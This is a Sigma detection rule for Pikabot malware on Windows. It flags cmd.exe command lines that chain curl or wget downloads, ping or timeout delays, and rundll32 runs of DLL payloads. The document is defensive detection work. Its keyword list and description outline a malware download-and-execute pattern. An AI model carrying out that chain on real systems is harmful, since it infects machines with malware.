Potential Pikabot Infection - Suspicious Command Combinations Via Cmd.EXE

 1title: Potential Pikabot Infection - Suspicious Command Combinations Via Cmd.EXE
 2id: e5144106-8198-4f6e-bfc2-0a551cc8dd94
 3status: test
 4description: |
 5    Detects the execution of concatenated commands via "cmd.exe". Pikabot often executes a combination of multiple commands via the command handler "cmd /c" in order to download and execute additional payloads.
 6    Commands such as "curl", "wget" in order to download extra payloads. "ping" and "timeout" are abused to introduce delays in the command execution and "Rundll32" is also used to execute malicious DLL files.
 7    In the observed Pikabot infections, a combination of the commands described above are used to orchestrate the download and execution of malicious DLL files.    
 8references:
 9    - https://github.com/pr0xylife/Pikabot/blob/7f7723a74ca325ec54c6e61e076acce9a4b20538/Pikabot_30.10.2023.txt
10    - https://github.com/pr0xylife/Pikabot/blob/7f7723a74ca325ec54c6e61e076acce9a4b20538/Pikabot_22.12.2023.txt
11author: Alejandro Houspanossian ('@lekz86')
12date: 2024-01-02
13tags:
14    - attack.defense-evasion
15    - attack.command-and-control
16    - attack.execution
17    - attack.t1059.003
18    - attack.t1105
19    - attack.t1218
20    - detection.emerging-threats
21logsource:
22    product: windows
23    category: process_creation
24detection:
25    selection_cmd:
26        CommandLine|contains|all:
27            - 'cmd'
28            - '/c'
29    selection_pipes:
30        CommandLine|contains:
31            - ' & '
32            - ' || '
33    selection_commands_1:
34        CommandLine|contains:
35            - ' curl'
36            - ' wget'
37            - ' timeout '
38            - ' ping '
39    selection_commands_2:
40        CommandLine|contains:
41            - ' rundll32'
42            - ' mkdir '
43    condition: all of selection_*
44falsepositives:
45    - Unknown
46level: medium